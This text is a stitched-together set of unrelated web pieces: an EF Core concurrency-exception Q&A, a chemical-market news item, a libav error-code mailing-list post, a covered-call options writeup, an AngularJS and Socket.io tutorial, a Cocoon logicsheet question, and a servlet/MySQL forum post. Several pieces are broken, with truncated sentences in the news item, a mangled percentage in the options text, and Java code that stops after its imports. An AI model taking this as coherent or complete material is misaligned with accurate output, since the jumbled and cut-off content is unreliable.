import java.sql.*;

// Connects to a database to retrieve music data
public class browser extends HttpServlet {
  public void doGet(HttpServletRequest request, HttpServletResponse response)
      throws ServletException, IOException {
    response.setContentType("text/html");
    PrintWriter out = response.getWriter();

    // Database connection code starts here
    Connection conn = null;

    // loading jdbc driver for mysql (help in mysql.jar file in classpath)
    try {
      Class.forName("com.mysql.jdbc.Driver").newInstance();
    } catch(Exception e) {
      System.out.println(e);
    }

    // connecting to database
    try {
      // connection string for demos database, username demos, password demo-pass
      conn = DriverManager.getConnection("jdbc:mysql:/mysql url goes here");
      // System.out.println("Connection to database successful.");
    } catch(SQLException se) {
      System.out.println(se);
    }

    // Create select statement and execute it
    try {
      // Get the category from the input form
      String categoryString = request.getParameter("category");
      // check if no category
      if (categoryString == "")\n" +
        "<center><img src=\"\" width=350 height=200/></center>\n" +
        "<H1 ALIGN=\"CENTER\">" + title + "</H1>\n");
      out.println("<TABLE BORDER=1 ALIGN=\"CENTER\">\n" +
        "<TR BGCOLOR=\"#FFAD00\">\n" +
        " <TH>Title\n" +
        " <TH>Director\n" +
        " <TH>Rating\n" +
        " <TH>Year Released\n" +
        " <TH>Price\n" +
        " <TH>Number in stock\n" +
        " <TH>image name");
      // Retrieve the results
      while(rs1.next()) {
        // getInt or getString or getFloat etc to get the appropriate column data
        // wrap output in html for web
        out.println("<TR>" +
          "<TD>" + rs1.getString("title") + "</TD>" +
          "<TD>" + rs1.getString("director") + "</TD>" +
          "<TD>" + rs1.getString("rating") + "</TD>" +
          "<TD>" + rs1.getDouble("year_released") + "</TD>" +
          "<TD>" + rs1.getString("price") + "</TD>" +
          "<TD>" + rs1.getString("stock_count") + "</TD>" +
          "<TD>" + rs1.getString("image_name") + "</TD>\n");
        //"<TD> <IMG SRC=\"../images/music/" + image_name
        //+"\">"
      }
      // close the html
      out.println("</TABLE></BODY></HTML>");
      // Close the statement and database connection
      // (must remember to always do this)
      stmt.close();
      conn.close();
    } catch(SQLException se) {
      System.out.println(se);
    }
  }
}
Any help at all would be really helpful as I am really finding this hard. If you go to
you can see the other files for how the catalog works. Again any help would be helpful, this is very stressing lol
[ December 29, 2006: Message edited by: david halewood ]
Ben Souther
Sheriff
Joined: Dec 11, 2004
Posts: 13410
I like...
posted
Dec 29, 2006 05:24:00
David,
JavaRanch tip:
If you are going to post more than a line or two of your code, wrap that
code in a set of UBB Code tags.
Doing so will help to preserve your code's indenting, making it easier to read.
If it is easier to read, more people will actually read it and you will
stand a better chance of getting help with your question.
See
UseCodeTags
for more
help with UBB code tags.
I was going to add them for you but when attempting to do so, I noticed that the code has no indenting.
You can edit your post by clicking on the link.
david halewood
Greenhorn
Joined: Dec 28, 2006
Posts: 3
posted
Dec 30, 2006 05:38:00
private static CatalogItem[] addedItem
private static CatalogItem[] items; // stores list of items
CatalogItem item;
CatalogItem details;
int recordingidDB;
String directorDB;
String titleDB;
String categoryDB;
String imageDB;
int durationDB;
String ratingDB;
String yearDB;
float priceDB;
int StockDB;
String\n" +
  "<center>\n" +
  "<H1 ALIGN=\"CENTER\">" + title + "</H1>\n");

// loop to go over each item in the array of catalogItem
for(int i=0; i<items.length; i++) {
  out.println("__________________________");
  details = item[i];
  addedItem[]
  if (details == null) {
    out.println("SORRY THERE HAS BEEN AN ERROR ");
  } else {
    out.println(titleDB + "\n" + priceDB + "\n");
    out.println("</BODY></HTML>");
  }
}

public static CatalogItem getItem(int recordingidDB) {
  CatalogItem item;
  for(int i=0; i<items.length; i++) {
    item = items[i];
    if (recordingidDB.equals(item.getItemID())) {
      return(item);
    }
  }
  return(null);
}

// Close the statement and database connection
// (must remember to always do this)
stmt.close();
conn.close();
} catch(SQLException se) {
  System.out.println(se);
}
}
}
I came up with the above solution but it still does not work fully. I have been told I need to add the item to an array during the first for loop. I called the array addedItem but do not know how to add the item to it. Can anybody help me?
The ADC Team has three further SoundBytes scheduled over the coming months. Two are repeats of popular sessions by Morgan Skinner and Chris Barker, and the third is a new session delivered by Simon Ince.
The titles, dates, and abstracts are shown below.
The sessions are charged at the rate of 1 hour from your ADC contract, or 2 proactive hours from your Premier contract, if you haven’t yet got an ADC contract. For this price you may have up to 2 Live Meeting connections, and you are of course free to use these to broadcast to a room full of people in your office.
If you require further information on this subject after the event, you can of course engage with the ADC team as usual to setup a suitable session.
SoundByte: Instrumenting Your .NET Application (Morgan Skinner)
Date & Time: Wednesday 29th July 2009 from 11:00 – 12:00 UK Time
Level: 300
Abstract: Did you know that the System.Diagnostics namespace was revamped in .NET 2.0? Are you aware of the excellent tracing facilities that are available within the .NET framework? Do you know how to easily add performance counters into an application, and how to do this with the least amount of trouble? And do you know that there are tools available with the .NET framework that allow you to visualise and correlate an end to end trace over WCF? If not then this is the session for you. Morgan will show how the classes within the System.Diagnostics namespace can be used to instrument your application and how to implement method entry/exit logging with the minimum of code. This session will also be useful if you are using a third party logging framework as some of the principles described can be used however you expose logging data.

SoundByte: Optimising Silverlight Performance (Chris Barker)
Date & Time: Friday 21st August 2009 from 11:00 – 12:00 UK Time
Abstract: As applications and web sites become “richer” more functionality is hosted in the browser, in many cases within Silverlight applications. Although this provides a great User Experience, care should be taken that the responsiveness of the application is not compromised. This SoundByte is focused on ensuring that Silverlight applications perform well, maintaining the Rich User Experience. It requires reasonable knowledge of Silverlight and .NET programming.

SoundByte: Debugging and Tuning AJAX Applications (Simon Ince)
Date & Time: Friday 25th September 2009 from 11:00 – 12:00 UK Time
Level: 200
Abstract: As web applications demand richer content so the complexity and volume of client-side code increases. Pushing this processing to the browser means that end users can experience errors or performance degradation without the developer’s knowledge. This session looks at a set of tools and techniques that will help you understand and remediate performance or functional problems within your AJAX code. Examples will be in ASP.NET AJAX 3.5 SP1, jQuery, and C#.
To book a place on any of these SoundBytes please contact your TAM or ADC, specifying the SoundByte you are interested in, and the names, email addresses, and telephone numbers of all the required attendees.
Please keep an eye on this blog or contact your ADC for information on future SoundBytes. | http://blogs.msdn.com/b/ukadc/archive/2009/07/15/adc-soundbytes-july-september-2009.aspx | CC-MAIN-2015-35 | refinedweb | 530 | 61.87 |
Currently, certain invalid MathML documents (such as a MathML document containing arbitrary HTML markup) are rendered improperly. According to the MathML specification, we should be providing better error information.
From), Section 6.4 Combining MathML and Other Formats:
."
I looked at the torture tests in WebKitGTK+ and they seem fine.
See also:
"User agents must act as if any MathML element whose contents does not match the element's content model was replaced, for the purposes of MathML layout and rendering, by an merror element in the MathML namespace containing some appropriate error message."
Created attachment 215269 [details]
testcase
(In reply to comment #1)
> I looked at the torture tests in WebKitGTK+ and they seem fine.
I think this comment was intended for Bug 121728. :-)
At the moment, the choice in the in-progress MathML refactoring is just to not display anything for invalid markup. However, we may do something as in Gecko and the refactoring will make that much easier. So I'm making this depends on bug 153991.
(That said, I suspect we want to spend more time on supporting valid markup than on deciding a fallback rendering for invalid markup...) | https://bugs.webkit.org/show_bug.cgi?id=123348 | CC-MAIN-2020-05 | refinedweb | 193 | 63.9 |
By now, I would assume that everyone has at least heard of the Kinect and understands the basic premise. It's a specialized sensor built by Microsoft
that is capable of recognizing and tracking humans in 3D space. How is it able to do that? While it's true that the Kinect has two cameras in it,
it does not accomplish 3D sensing through stereo optics. A technology called Light Coding makes the 3D sensing possible.
On the Kinect, there is an Infrared (IR) Projector, a Color (RGB) Camera, and an Infrared (IR) Sensor. For purposes of 3D sensing, the IR Projector emits
a grid of IR light in front of it. This light then reflects off objects in its path and is reflected back to the IR Sensor. The pattern received
by the IR Sensor is then decoded in the Kinect to determine the depth information and is sent via USB to another device for further processing.
This depth information is incredibly useful in computer vision applications. As a part of the Kinect Beta SDK, this depth information is used
to determine joint locations on the human body, thereby allowing developers like us to come up with all sorts of useful applications and functionality.
Before you download the links for either the demo application source or demo application executable, you need to prepare your development environment.
To use this application, you need to have the Kinect Beta 2 SDK installed
on your machine:.
At the time of this posting, the commercial SDK has not been released. Please be sure to only use the Kinect Beta 2 SDK for this article’s downloads.
Also, the SDK installs with a couple demo applications; please be sure that these run on your machine before you download the files for this article.
Before I dive into the solution, let me better express the problem. Below is a screenshot.
The first step in the pixel filtering process is to transform the depth data from the Kinect into something that is a bit easier to process.
private short[] CreateDepthArray(ImageFrame image)
{
short[] returnArray = new short[image.Image.Width * image.Image.Height];
byte[] depthFrame = image.Image.Bits;
// Process each row in parallel
Parallel.For(0, 240, depthImageRowIndex =>
{
// Process each pixel in the row
for (int depthImageColumnIndex = 0; depthImageColumnIndex < 640; depthImageColumnIndex += 2)
{
var depthIndex = depthImageColumnIndex + (depthImageRowIndex * 640);
var index = depthIndex / 2;
returnArray[index] =
CalculateDistanceFromDepth(depthFrame[depthIndex], depthFrame[depthIndex + 1]);
}
});
return returnArray;
}
This method creates a simple short[] into which a depth value for each pixel is placed. The depth value is calculated from the byte[]
of an ImageFrame that is sent every time the Kinect pushes a new frame. For each pixel, the byte[] of the ImageFrame has two values.
private short CalculateDistanceFromDepth(byte first, byte second)
{
// Please note that this would be different if you
// use Depth and User tracking rather than just depth
return (short)(first | second << 8);
}
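The expression `first | second << 8` is a plain little-endian reassembly of a 16-bit depth value from its two bytes. A quick sanity check of the same arithmetic in Python (the byte values here are made up for illustration):

```python
def distance_from_depth(first: int, second: int) -> int:
    """Recombine the two bytes of a depth-only Kinect pixel
    (low byte first, high byte second) into one distance value."""
    return first | (second << 8)

# Low byte 0x34 plus high byte 0x12 reassemble to 0x1234 (4660).
print(distance_from_depth(0x34, 0x12))  # 4660
```

Note that the article's C# version casts the result to `short`; with depth-only data the value fits in 16 bits, so the Python sketch skips the cast.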
Now that we have an array that is a bit easier to process, we can begin applying the actual filter to it. We scan through the entire array, pixel by pixel,
looking for Zero values. These are the values that the Kinect couldn't process properly. We want to remove as many of these as realistically possible without
degrading performance or reducing other features of the data (more on that later).
When we find a Zero value in the array, it is considered a candidate for filtering, and we must take a closer look. In particular, we want to look
at the neighboring pixels. The filter effectively has two "bands" around the candidate pixel, and is used to search for non-Zero values in other pixels. The filter
creates a frequency distribution of these values, and takes note of how many were found in each band. It will then compare these values to an arbitrary
threshold value for each band to determine if the candidate should be filtered. If the threshold for either band is broken, then the statistical
mode of all the non-Zero values will be applied to the candidate, otherwise it is left alone.
The biggest considerations for this method are ensuring that the bands for the filter actually surround the pixel as they would be displayed in the rendered image,
and not just values next to each other in the depth array. The code to apply this filter is as follows:
short[] smoothDepthArray = new short[depthArray.Length];
// We will be using these numbers for constraints on indexes
int widthBound = width - 1;
int heightBound = height - 1;
// We process each row in parallel
Parallel.For(0, 240, depthArrayRowIndex =>
{
// Process each pixel in the row
for (int depthArrayColumnIndex = 0; depthArrayColumnIndex < 320; depthArrayColumnIndex++)
{
var depthIndex = depthArrayColumnIndex + (depthArrayRowIndex * 320);
// We are only concerned with eliminating 'white' noise from the data.
// We consider any pixel with a depth of 0 as a possible candidate for filtering.
if (depthArray[depthIndex] == 0)
{
// From the depth index, we can determine the X and Y coordinates that the index
// will appear in the image. We use this to help us define our filter matrix.
int x = depthIndex % 320;
int y = (depthIndex - x) / 320;
// The filter collection is used to count the frequency of each
// depth value in the filter array. This is used later to determine
// the statistical mode for possible assignment to the candidate.
short[,] filterCollection = new short[24,2];
// The inner and outer band counts are used later to compare against the threshold
// values set in the UI to identify a positive filter result.
int innerBandCount = 0;
int outerBandCount = 0;
// The following loops will loop through a 5 X 5 matrix of pixels surrounding the
// candidate pixel. This defines 2 distinct 'bands' around the candidate pixel.
// If any of the pixels in this matrix are non-0, we will accumulate them and count
// how many non-0 pixels are in each band. If the number of non-0 pixels breaks the
// threshold in either band, then the average of all non-0 pixels in the matrix is applied
// to the candidate pixel.
for (int yi = -2; yi < 3; yi++)
{
for (int xi = -2; xi < 3; xi++)
{
// yi and xi are modifiers that will be subtracted from and added to the
// candidate pixel's x and y coordinates that we calculated earlier. From the
// resulting coordinates, we can calculate the index to be addressed for processing.
// We do not want to consider the candidate
// pixel (xi = 0, yi = 0) in our process at this point.
// We already know that it's 0
if (xi != 0 || yi != 0)
{
// We then create our modified coordinates for each pass
var xSearch = x + xi;
var ySearch = y + yi;
// While the modified coordinates may in fact calculate out to an actual index, it
// might not be the one we want. Be sure to check
// to make sure that the modified coordinates
// match up with our image bounds.
if (xSearch >= 0 && xSearch <= widthBound &&
ySearch >= 0 && ySearch <= heightBound)
{
var index = xSearch + (ySearch * width);
// We only want to look for non-0 values
if (depthArray[index] != 0)
{
// We want to find count the frequency of each depth
for (int i = 0; i < 24; i++)
{
if (filterCollection[i, 0] == depthArray[index])
{
// When the depth is already in the filter collection
// we will just increment the frequency.
filterCollection[i, 1]++;
break;
}
else if (filterCollection[i, 0] == 0)
{
// When we encounter a 0 depth in the filter collection
// this means we have reached the end of values already counted.
// We will then add the new depth and start it's frequency at 1.
filterCollection[i, 0] = depthArray[index];
filterCollection[i, 1]++;
break;
}
}
// We will then determine which band the non-0 pixel
// was found in, and increment the band counters.
if (yi != 2 && yi != -2 && xi != 2 && xi != -2)
innerBandCount++;
else
outerBandCount++;
}
}
}
}
}
// Once we have determined our inner and outer band non-zero counts, and
// accumulated all of those values, we can compare it against the threshold
// to determine if our candidate pixel will be changed to the
// statistical mode of the non-zero surrounding pixels.
if (innerBandCount >= innerBandThreshold || outerBandCount >= outerBandThreshold)
{
short frequency = 0;
short depth = 0;
// This loop will determine the statistical mode
// of the surrounding pixels for assignment to
// the candidate.
for (int i = 0; i < 24; i++)
{
// This means we have reached the end of our
// frequency distribution and can break out of the
// loop to save time.
if (filterCollection[i,0] == 0)
break;
if (filterCollection[i, 1] > frequency)
{
depth = filterCollection[i, 0];
frequency = filterCollection[i, 1];
}
}
smoothDepthArray[depthIndex] = depth;
}
}
else
{
// If the pixel is not zero, we will keep the original depth.
smoothDepthArray[depthIndex] = depthArray[depthIndex];
}
}
});
I have recently updated this filter to be more accurate compared to my original post. In my original post, if any of the band thresholds were broken,
the statistical mean of all non-Zero pixels in the filter matrix was assigned to the candidate pixel; I have changed this to use the statistical mode. Why does this matter?
Consider the previous picture representing a theoretical filter matrix of depth values. From looking at these values, we can visually identify that there is
probably an edge of some object in our filter matrix. If we were to apply the average of all these values to the candidate pixel, it would remove the
noise from the X,Y perspective but it would introduce noise along the Z,Y perspective; placing the candidate pixel's depth half way between the two
individual features. By using the statistical mode, we are mostly assured of assigning a depth to the candidate pixel that matches the most dominant feature in the filter matrix.
I say 'mostly' because there is still a chance of identifying a submissive feature as being dominant due to small variances in
the depth readings; this has had negligible effect on the results though. A solution to this issue involves data discretization and deserves a separate article of its own.
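The difference between the two statistics is easy to see on a toy filter window that straddles an edge. In this Python sketch (the depth values are illustrative, not real Kinect readings), the mean invents a depth that belongs to neither surface, while the mode snaps to the dominant one:

```python
from collections import Counter

def mean_depth(values):
    """Mean of the non-zero depths in a filter window (integer mm)."""
    nonzero = [v for v in values if v != 0]
    return sum(nonzero) // len(nonzero)

def mode_depth(values):
    """Statistical mode of the non-zero depths in a filter window."""
    nonzero = [v for v in values if v != 0]
    return Counter(nonzero).most_common(1)[0][0]

# A 5x5 window straddling an edge: 16 pixels at ~900 mm, 8 at ~2000 mm,
# and the zero candidate pixel in the middle.
window = [900] * 16 + [2000] * 8 + [0]
print(mean_depth(window))  # 1266 -- between the two surfaces, i.e. new Z noise
print(mode_depth(window))  # 900  -- the dominant feature
```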
Now that we have a filtered depth array on our hands, we can move on to the process of calculating a weighted moving average of an arbitrary number of previous depth arrays.
The reason we do this is to reduce the flickering effect produced by the random noise still left in the depth array. At 30 fps, you're really going to notice the flicker.
I had previously tried an interlacing technique to reduce the flicker, but it never really looked as smooth as I would like. After experimenting with a couple other methods,
I settled on the weighted moving average.
What we do is set up a Queue<short[]> to store our most recent N number of depth arrays. Since Queue's are a FIFO (First In, First Out) collection object,
they have excellent methods to handle discrete sets of time series data. We then weight the importance of the most recent depth arrays to the highest, and the importance
of the oldest the lowest. A new depth array is created from the weighted average of the depth frames in the Queue.
Queue<short[]>
This weighting method was chosen due to the blurring effect that averaging motion data can have on the final rendering. If you were to stand still,
a straight average would work fine with a small number of items in your Queue. However, once you start moving around, you will have a noticeable trail
behind you anywhere you go. You can still get this with a weighted moving average, but the effects are less noticeable. The code for this is as follows:
averageQueue.Enqueue(depthArray);
CheckForDequeue();
int[] sumDepthArray = new int[depthArray.Length];
short[] averagedDepthArray = new short[depthArray.Length];
int Denominator = 0;
int Count = 1;
// REMEMBER!!! Queue's are FIFO (first in, first out).
// This means that when you iterate over them, you will
// encounter the oldest frame first.
// We first create a single array, summing all of the pixels
// of each frame on a weighted basis and determining the denominator
// that we will be using later.
foreach (var item in averageQueue)
{
// Process each row in parallel
Parallel.For(0,240, depthArrayRowIndex =>
{
// Process each pixel in the row
for (int depthArrayColumnIndex = 0; depthArrayColumnIndex < 320; depthArrayColumnIndex++)
{
var index = depthArrayColumnIndex + (depthArrayRowIndex * 320);
sumDepthArray[index] += item[index] * Count;
}
});
Denominator += Count;
Count++;
}
// Once we have summed all of the information on a weighted basis,
// we can divide each pixel by our denominator to get a weighted average.
Parallel.For(0, depthArray.Length, i =>
{
averagedDepthArray[i] = (short)(sumDepthArray[i] / Denominator);
});
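The same weighting scheme is compact in Python. This sketch (the frame sizes and depth values are toy data) mirrors the C# loop above: the oldest frame in the FIFO queue gets weight 1, the newest gets weight N, and each pixel is divided by the sum of the weights:

```python
from collections import deque

def weighted_average(frames: deque) -> list:
    """Weighted moving average of depth frames.
    Frames are ordered oldest-first (FIFO); newer frames weigh more."""
    denominator = 0
    sums = [0] * len(frames[0])
    for weight, frame in enumerate(frames, start=1):  # oldest frame -> weight 1
        for i, depth in enumerate(frame):
            sums[i] += depth * weight
        denominator += weight
    return [s // denominator for s in sums]

# Three 2-pixel frames, oldest to newest; weights are 1, 2, 3 (denominator 6).
queue = deque([[300, 300], [600, 300], [900, 300]])
print(weighted_average(queue))  # [700, 300]
```

Pixel 0 works out to (300·1 + 600·2 + 900·3) / 6 = 700, closer to the newest reading than a straight average would be, which is exactly the reduced motion-trail effect described above.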
Now that we have applied both of our smoothing techniques to the depth data, we can render the image to a Bitmap:
Bitmap
// We multiply the product of width and height by 4 because each byte
// will represent a different color channel per pixel in the final iamge.
byte[] colorFrame = new byte[width * height * 4];
// Process each row in parallel
Parallel.For(0, 240, depthArrayRowIndex =>
{
// Process each pixel in the row
for (int depthArrayColumnIndex = 0; depthArrayColumnIndex < 320; depthArrayColumnIndex++)
{
var distanceIndex = depthArrayColumnIndex + (depthArrayRowIndex * 320);
// Because the colorFrame we are creating has four times as many bytes representing
// a pixel in the final image, we set the index to be the depth index * 4.
var index = distanceIndex * 4;
// Map the distance to an intensity that can be represented in RGB
var intensity = CalculateIntensityFromDistance(depthArray[distanceIndex]);
// Apply the intensity to the color channels
colorFrame[index + BlueIndex] = intensity;
colorFrame[index + GreenIndex] = intensity;
colorFrame[index + RedIndex] = intensity;
}
});
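CalculateIntensityFromDistance itself isn't shown in the excerpt above. One plausible stand-in (an assumption, not the article's actual implementation) maps a working depth range linearly onto 255..0 so that nearer objects render brighter; the 800–4000 mm window used here is also an assumption, roughly the Kinect's usable range:

```python
MIN_DEPTH, MAX_DEPTH = 800, 4000  # assumed usable range, in millimetres

def intensity_from_distance(distance: int) -> int:
    """Map a depth reading to a grey level: near -> bright, far -> dark."""
    if distance <= 0:
        return 0  # unknown pixels stay black
    clamped = min(max(distance, MIN_DEPTH), MAX_DEPTH)
    return 255 - (clamped - MIN_DEPTH) * 255 // (MAX_DEPTH - MIN_DEPTH)

print(intensity_from_distance(800))   # 255 (nearest -> white)
print(intensity_from_distance(4000))  # 0   (farthest -> black)
```

Since the same intensity is written to the blue, green, and red channels, the result is the greyscale depth image seen in the demo.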
Now that I have shown you some of the code and theory behind the smoothing process, let’s look at it in terms of using the demo application provided in the links above.
I'll leave you with a brief video demonstration of the demo application. In it, I pretty much just sit and wave my arms around, but it gives you a good idea
of what these techniques are capable of doing. I run through all the combinations of features in 70 seconds, and no audio.
Please keep in mind, that it is almost impossible to see a change in the flicker when I turn off the weighted moving average due to the low frame rate
of YouTube. You'll just have to trust me, or download the code; it's like night and day.
Here is a direct link to the video on YouTube:.
If this topic interests you, I would highly recommend reading the Microsoft Research paper on KinectFusion: Real-Time Dense Surface Mapping and Tracking.
They have done some amazing work in this particular area. However, I don’t think you would ever be able to achieve these results
with .NET:.
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
sem_open - initialise and open a named semaphore (REALTIME)
#include <semaphore.h> sem_t *sem_open(const char *name, int oflag, ...);
The sem_open() function establishes a connection between a named semaphore and a process. Calls to sem_open() using the same name will refer to the same semaphore object, as long as that name has not been removed. If name does not begin with the slash character, the effect is implementation-dependent. The interpretation of slash characters other than the leading slash character in name is implementation-dependent.
If a process makes multiple successful calls to sem_open() with the same value for name, the same semaphore address is returned for each such successful call, provided that there have been no calls to sem_unlink() for this semaphore.
References to copies of the semaphore produce undefined results.
- [ENAMETOOLONG]
- The length of the name string exceeds PATH_MAX, or a pathname component is longer than NAME_MAX while _POSIX_NO_TRUNC is in effect.
- [ENFILE]
- Too many semaphores are currently open in the system.
- [ENOENT]
- O_CREAT is not set and the named semaphore does not exist.
- [ENOSPC]
- There is insufficient space for the creation of the new named semaphore.
- [ENOSYS]
- The function sem_open() is not supported by this implementation.
semctl(), semget(), semop(), sem_close(), sem_post(), sem_trywait(), sem_unlink(), sem_wait(), <semaphore.h>.
Derived from the POSIX Realtime Extension (1003.1b-1993/1003.1i-1995) | http://www.opengroup.org/onlinepubs/007908799/xsh/sem_open.html | crawl-002 | refinedweb | 201 | 57.67 |
What’s New
XNA Math version 2.04 includes:
- Addition of new data types and associated load-store functions:
- XMBYTEN2, XMBYTE2, XMUBYTEN2, XMUBYTE2
- XMLoadByteN2, XMLoadByte2, XMLoadUByteN2, XMLoadUByte2
- XMStoreByteN2, XMStoreByte2, XMStoreUByteN2, XMStoreUByte2
- XMINT2, XMUINT2, XMINT3, XMUINT3, XMINT4, XMUINT4
- XMLoadSInt2, XMLoadUInt2, XMLoadSInt3, XMLoadUInt3, XMLoadSInt4, XMLoadUInt4
- XMStoreSInt2, XMStoreUInt2, XMStoreSInt3, XMStoreUInt3, XMStoreSInt4, XMStoreUInt4
- Marked most single-parameter C++ constructors with ‘explicit’ keyword
- Corrected range issues with SSE implementations of XMVectorFloor and XMVectorCeiling
- Resolved a boundary issue with XMLoadShort* and XMLoadByte* that previously triggered an assert on values -32768 / -128
Release Notes
- Due to a bug in optimizations done by the Visual Studio 2010 C/C++ compiler, some XNA Math functions will not work properly when used with
_XM_NO_INTRINSICS_. This bug only appears at full optimization settings (/Ox) for Windows 32-bit, and may appear at any optimization setting for Windows 64-bit (x64). This issue does not impact the SSE2 intrinsic version of the XNA Math functions. This issue is fixed in Visual Studio 2010 Service Pack 1.
GitHub: Note that DirectXMath is now hosted on GitHub.
It's a pitty, that there is no date for a new release of the DX-SDK. Our team has found a strange bug within XAudio. If you want to know more about that, please post it here and I'll contact you.
Why MS deleted all the xna math 2.0x msdn library reference? Ok, there is the new directxmath, aka xna math 3.0x, but how about people that need the old documentation? :
Aessio – The libraries are generally pretty close, so you don't generally need the old docs. You can get them in the DirectX SDK (June 2010) in the offline documentation file if you really need them.
Generally people should be using the DirectXMath version instead of XNAMath. It really only makes sense for folks writing for Xbox 360 or having to stick with VS 2008 for some reason (in which case see XNAMath 2.05). You can use DirectXMath for VS 2010 or VS 2012, Windows Store Apps, and Win32 desktop apps for Windows Vista, Windows 7, and Windows 8. Really if you needed to, you could even use it for Windows XP but you'd have to copy the files into your path since the "110_xp" Platform target for VS 2012 is otherwise using the Windows 7.1 SDK headers.
Our of curiosity, why are you still using XNAMath instead of DirectXMath?
Thx for the replay.
I started learning some D3D tutorial that use XNA Math, but now I decided to convert them to DirectXMath as "homework", so that's not a big deal as you wrote :p
In XNA Math you can create vertexes using XMFLOAT3 how do you that in DirectXMath?
DirectXMath also has XMFLOAT3. It's just in a C++ namespace now.
Real works always found due required invention.
– 'stay true jcrue.' | https://blogs.msdn.microsoft.com/chuckw/2011/02/22/xna-math-version-2-04/ | CC-MAIN-2017-17 | refinedweb | 475 | 54.32 |
Persistent Place Identifier
This page is for a systematic review of the theme:
a unique identifier to identify an OSM feature, and that never changes. (for short a
perma_id).
As working definition for OSM feature we can say that it is "a kind of map feature, a stable thing in some (time-space) scale of reference"...
The theme have its concepts and problems/solutions to be discussed, and this article is is used to express and preserve reference-models, consensus and working definitions. Some parts of this theme are under "diffuse discussion" with no nitid consensus, so this article also reflect the diversity of opinions — the article express, when possible, a neutral point of view — and the lack of some solid definitions.
There are also closed proposals, the Permanent ID and the stable.openstreetmap.org server, with nitid objectives and less diffuse discussion.
Working definitions
As working definition for OSM feature we can say that it is a "stable thing in some scale of reference"... In detail:
- is an OSM element: relation, way or node.
The element is already the container of the core ID, and would also be the container of the perma_id, but they differ in many characteristics:
1- the datatype (the core ID is an serial integer and perma_id can be non-serial or even hierarchical value like an IP number); 2- the obligation (perma_id is not necessary in all elements); 3- the backup/restore process (core ID will be refreshed with a new value); 4- the move of the perma_id from original element to a new/evolved element, to fit its concept in better editions of the map or reality evolution; 5- the perma_id can be implemented as tag (or even as lookup table) instead core attribute.
- has public utility (a concept): as an OSM's point of interest concept, it have some tags associated and can be characterized as map feature.
Is possible to to check "importance" (notability or utility-stability) of the feature, through some objective criterion – or, in the absence of criteria, through voting.
- has a time-scale of reference to say "is stable about time" ("not changed"). The time-scales for mountains are bigger than a museums, that are bigger than restaurants or pubs.
- has a time-class: a practical way to assign time-scale to an object. The time-class can be inferred from element's tags and metrics.
PS: "class geographical" (rivers and mountains) and "class administrative" (countries and cities) objects have different global time-scales. And subclasses for smaller objects: a mountain range have a different time-scale than a little mountain, a city have different time-scale than a country.
- has creation and extinction criteria to attributes like "creation year" and "extinction year".
PS: when a natural object like a island is extinct, its perma_id persist, and by the perma_id its geometry can be restored from some "official OSM backup".
- has error-position reference to say "is stable about position" ("not changed its position"). 1km, 10km, 1m, 5m... each kind of object have an admissible error-position.
- has error-concept reference to say "is stable about concept" ("not changed its public utility"). Is acceptable to a pub change to a restaurant, but not to change to an hospital. Is acceptable that a city changes its name, but not that changes from "official city" to "non-official" or to "official district of other city".
So, the uniqueness of the perma_id is about this working definition: there are a unique OSM-element with that identifier.
Non-persistent IDs
There are good candidates to "persistent place-identifier", but all fails in the main property, that is to ensure persistence. In this context of non-permanent IDs, the most important example is the Nominatim's
place_id that is "independent of geometry".
Element's OSM_ID
Elements are the main references as "official geometry ID":
- Relation ID: the unique-ID of an element of the kind "relation",
as official URL
openstreetmap.org/relation/$OSM_RID
as original XML
<relation id="$OSM_RID" changeset="$OSM_CHGID" ...>...</relation>
- Way ID: the unique-ID of an element
as official URL
openstreetmap.org/way/$OSM_WID
as original XML
<way id="$OSM_WID" changeset="$OSM_CHGID" ... />...</way>(example).
- Node ID: the unique-ID of an element
as official URL
openstreetmap.org/node/$OSM_NID
as original XML
<node id="$OSM_WID" changeset="$OSM_CHGID" .../>(example).
Nominatim's place_id (internal identifier)
Nominatim is a tool to search OSM data by name or address, and, to operate internally this tool, it uses a lookup table
<place_id,osm_type,osm_id>
to offer the
place_id as an "OSM any element ID".
The
osm_type can by any, a relation, way or node. Example: the
place_id=178741737 was a record with
osm_type=relation and
osm_id=62422 in July 2018, that was the Berlin (Q64) concept, pointing to the correct map
- NOTICE: the Nominatim's place_id place_id is only an internal parameter of the engine. You cannot use place_id for anything, it is a technical database key and depends on a single Nominatim instance.
OSM external persistence implementations
Implementations that are "non-official", where the implemented perma_id is not a tag neither an XML-attribute of dumps or backups. In the case of an API (eg. an ID-resolver), is "external" in the sense that the URL of its endpoint is not implemented with the
openstreetmap.org domain.
Query-to-map
See Query-to-map. Preserves the "permanent name" (name and type) of an OSM feature in the service
query2map.toolforge.org. Use name as main identifier, and key (and types?) as "namespace" for name.
OSMLR
As Github's project opentraffic/osmlr (see also blog presentation) is a complex "backup and lookup" system that ensures persistence of the ID of "almost any stretch of roadways in OpenStreetMap".
Have good historical data, so we can use it tho check our stability hypothesis.
Overpass API/Permanent ID
See Overpass API/Permanent ID ... need better explanation there ... Please help to enhance it.
Non-OSM reference-implementations
Other reference-examples. The main is Wikidata, that have a little coupling with OSM.
As URL
See w:Persistent uniform resource locator (Persistent URL or PURL).
In Wikidata infrastructure
Persistent (place) unique identifiers (perma_id's) assigned by "Place-ID autorithies".
(to see a list of all valid authorities, follow the link and click on the "play")
Each authority-ID can be described as: URN-schema (the authority's namespace) and a valid URN in that schema. (see wikipedia's namespace and URN concepts). See a sample on the right side table.
See also w:Office for National Statistics list.
... (under construction)...
Problems and solutions
For each reasonable problem there is a reasonable solution (to be detailed in the future implementation), and so far, within the working definitions elaborated at the beginning of the article, no major problems were detected, which would impair the Persistent Place Identifier.
Defining classes of OSM features
To classify OSM features (when it will be assigned with perma_id) according tags that describe the element, in a more coarse set of map feature, we can imagine some basic groups, labeled by an arbitrary group-number:
0- administrative map features: for cities, countries, districts, etc.
1- "relief and hydrography" map features: for rivers, mountains, etc.
2- transport map features: for all ways, cycleways, train lines, etc.
3- other: no many others.
Each group have a difference scale-correlation behaviour, so is necessary to characterize group before to characterize time and spatial scales of the OSM feature.
Defining spatial scale of a OSM feature
There are some usual spatial scale definitions in Geography, and simple database functions (ref. PostGIS) and approximations as ST_Length(), ST_Area or ST_Area(ST_Envelope()) that will automatically classify the element (way or relation) that represents a taged feature.
The use of the scale, by other hand, is to estimate error position, and the "acceptable error" is an subjective criteria. For example maps of some nations of Africa and souh america can accept big changes, enquanto mapas de certas nações da europa podem não aceitar.
Defining time scale of a OSM feature
Time scales here is not about "Geologic time scale" neither the usual orders of magnitude in time units. Is a razonable choice of units for each general type ...
... (under construction)...
Assigning the perma_id
